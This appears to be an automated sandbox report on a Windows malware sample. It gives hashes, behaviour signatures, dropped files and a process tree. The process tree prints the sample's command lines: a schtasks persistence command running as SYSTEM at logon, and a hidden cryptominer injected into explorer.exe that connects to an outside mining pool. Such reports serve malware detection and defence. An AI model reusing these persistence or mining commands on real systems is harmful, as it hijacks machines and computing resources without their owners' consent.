Analysis

  • max time kernel
    9s
  • max time network
    111s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-01-2024 09:29

General

  • Target

    4b120bc4e493e86e34b1efea1a10db6c.exe

  • Size

    64KB

  • MD5

    4b120bc4e493e86e34b1efea1a10db6c

  • SHA1

    25e40d98177f72e612fb2def28a6cec2af8abc00

  • SHA256

    e66d2dae8f47c828b769924d7bd5f08e50b18399f49dd0bc6cc6d70577972a28

  • SHA512

    a35e33ced2e68903519210e386c4251a87a65afd1d4b66346e1ebef2b1f7798823a56732869d9e363c2c28cfb1a74177ffd9caf1c09a1668b8fef4ba92d8b6fc

  • SSDEEP

    768:FSo8zLAAVxojgGxuwmSyd2glQ6pyZCQ75v3u211ToUQH7pFMhfgJ/3bhiAMG4r8j:FJaLlOjgTLBHpyQY5WHFMF41r7frqo

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\4b120bc4e493e86e34b1efea1a10db6c.exe
    "C:\Users\Admin\AppData\Local\Temp\4b120bc4e493e86e34b1efea1a10db6c.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1132
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1660
    • C:\Users\Admin\AppData\Roaming\Services.exe
      "C:\Users\Admin\AppData\Roaming\Services.exe"
      2⤵
        PID:4844
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit
          3⤵
            PID:3976
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80
            3⤵
              PID:3044
          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
            2⤵
            • Executes dropped EXE
            PID:4804
            • C:\Users\Admin\AppData\Roaming\Services.exe
              "C:\Users\Admin\AppData\Roaming\Services.exe"
              3⤵
                PID:2252
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit
                  4⤵
                    PID:5828
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80
                    4⤵
                      PID:4480
                  • C:\Users\Admin\AppData\Roaming\Services.exe
                    "C:\Users\Admin\AppData\Roaming\Services.exe"
                    3⤵
                      PID:5600
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit
                        4⤵
                          PID:4788
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80
                          4⤵
                            PID:1440
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"
                      1⤵
                      • Creates scheduled task(s)
                      PID:4076
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"
                      1⤵
                      • Creates scheduled task(s)
                      PID:1696
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"
                      1⤵
                      • Creates scheduled task(s)
                      PID:4632
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"
                      1⤵
                      • Creates scheduled task(s)
                      PID:5464

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Services.exe.log

                      Filesize

                      1KB

                      MD5

                      ceb4947e275f4845f304cd494e65aa0c

                      SHA1

                      ac77f13a759423a94c1bcb40a08f7a48800f202b

                      SHA256

                      5b44ad3f2e7ec4999744e367f1e6e3fe9cfeaa6d4f025bd17f7ac534383e78c9

                      SHA512

                      19300aa7db232c2698bf7b5b29309606d149367e8818af03f1808e32269392f4fea0f67a9a91dde328388e3453e44ae1623fb25c42cff9f1531c97dcb2dc0c73

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys

                      Filesize

                      14KB

                      MD5

                      0c0195c48b6b8582fa6f6373032118da

                      SHA1

                      d25340ae8e92a6d29f599fef426a2bc1b5217299

                      SHA256

                      11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

                      SHA512

                      ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

                      MD5

                      d41d8cd98f00b204e9800998ecf8427e

                      SHA1

                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                      SHA256

                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                      SHA512

                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

                      Filesize

                      12KB

                      MD5

                      24ff7a763f96b93d11e47f99678620c6

                      SHA1

                      cbbae214991f923b9f62eef19bf4a2ada083f514

                      SHA256

                      2837716c122b32c14068667611fa685b0bb23450b17912de262013d2199634ba

                      SHA512

                      2c9e0303f140d7a414f34964233c61f6f05f60a877ffd050a109ed956db9d098f0dc9afa98a949487b312630b44c88941f8df65324ac1ac355ffcc70ed69c0cb

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.log

                      Filesize

                      98KB

                      MD5

                      b02e9bc499adf8e14f68ca2178dbb140

                      SHA1

                      b99ca4228b2daf686533f39be2c79decc07e3e1f

                      SHA256

                      7161fa42a6af56de2dd5535d2e7a1db05e54191c4805aa8fd8fe0cf882c5bf9a

                      SHA512

                      da2f3745165bc0060df992e13949b6cc0bfa1868124fc24531f19b53ed63429ab751c9fd0ab73d933e0f241ebc66a95c9ae1667d4e4e82af8e2d1d0c6dceb110

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.log

                      Filesize

                      44KB

                      MD5

                      8dd7325927dadc0671891968133e5745

                      SHA1

                      f787c2b9191a576f1acc8f950b48841ffba7868e

                      SHA256

                      bbfc4bf7f7e55a008b4eb6d59ac84f9b97b2298a8963c36e0d13f4acd92360d4

                      SHA512

                      78777b8aa66197886463bc932e7ac6fb0b17ac1050d67215ac79e759141cf34c460619c8f83435935543a5049f7a1be6936b53d079a94f7909e5ed28e8e12806

                    • C:\Users\Admin\AppData\Roaming\Services.exe

                      Filesize

                      64KB

                      MD5

                      4b120bc4e493e86e34b1efea1a10db6c

                      SHA1

                      25e40d98177f72e612fb2def28a6cec2af8abc00

                      SHA256

                      e66d2dae8f47c828b769924d7bd5f08e50b18399f49dd0bc6cc6d70577972a28

                      SHA512

                      a35e33ced2e68903519210e386c4251a87a65afd1d4b66346e1ebef2b1f7798823a56732869d9e363c2c28cfb1a74177ffd9caf1c09a1668b8fef4ba92d8b6fc

                    • memory/1132-0-0x0000000000CD0000-0x0000000000CE4000-memory.dmp

                      Filesize

                      80KB

                    • memory/1132-1-0x0000000001680000-0x0000000001690000-memory.dmp

                      Filesize

                      64KB

                    • memory/1132-3-0x000000001C850000-0x000000001C860000-memory.dmp

                      Filesize

                      64KB

                    • memory/1132-2-0x00007FFA0F140000-0x00007FFA0FC01000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/1132-31-0x00007FFA0F140000-0x00007FFA0FC01000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/1440-90-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/1440-87-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/1440-89-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/1440-88-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/1440-86-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/1440-81-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/1440-85-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/1440-82-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/1440-91-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2252-37-0x00007FFA0F140000-0x00007FFA0FC01000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/2252-42-0x00007FFA0F140000-0x00007FFA0FC01000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/2252-68-0x00007FFA0F140000-0x00007FFA0FC01000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/3044-50-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/3044-49-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/3044-56-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/3044-58-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/3044-53-0x00000000024B0000-0x00000000024D0000-memory.dmp

                      Filesize

                      128KB

                    • memory/3044-60-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/3044-52-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/3044-59-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/3044-57-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/3044-76-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/3044-55-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/4480-65-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/4480-74-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/4480-75-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/4480-73-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/4480-70-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/4480-69-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/4480-66-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/4480-77-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/4480-72-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/4804-28-0x0000000001940000-0x0000000001946000-memory.dmp

                      Filesize

                      24KB

                    • memory/4804-38-0x00007FFA0F140000-0x00007FFA0FC01000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/4804-30-0x00007FFA0F140000-0x00007FFA0FC01000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/4804-25-0x0000000000B80000-0x0000000000B88000-memory.dmp

                      Filesize

                      32KB

                    • memory/4844-48-0x000000001BFB0000-0x000000001BFB6000-memory.dmp

                      Filesize

                      24KB

                    • memory/4844-39-0x00007FFA0F140000-0x00007FFA0FC01000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/4844-33-0x000000001DE00000-0x000000001DE12000-memory.dmp

                      Filesize

                      72KB

                    • memory/4844-54-0x00007FFA0F140000-0x00007FFA0FC01000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/4844-32-0x00007FFA0F140000-0x00007FFA0FC01000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/5600-44-0x00007FFA0F140000-0x00007FFA0FC01000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/5600-84-0x00007FFA0F140000-0x00007FFA0FC01000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/5600-71-0x00007FFA0F140000-0x00007FFA0FC01000-memory.dmp

                      Filesize

                      10.8MB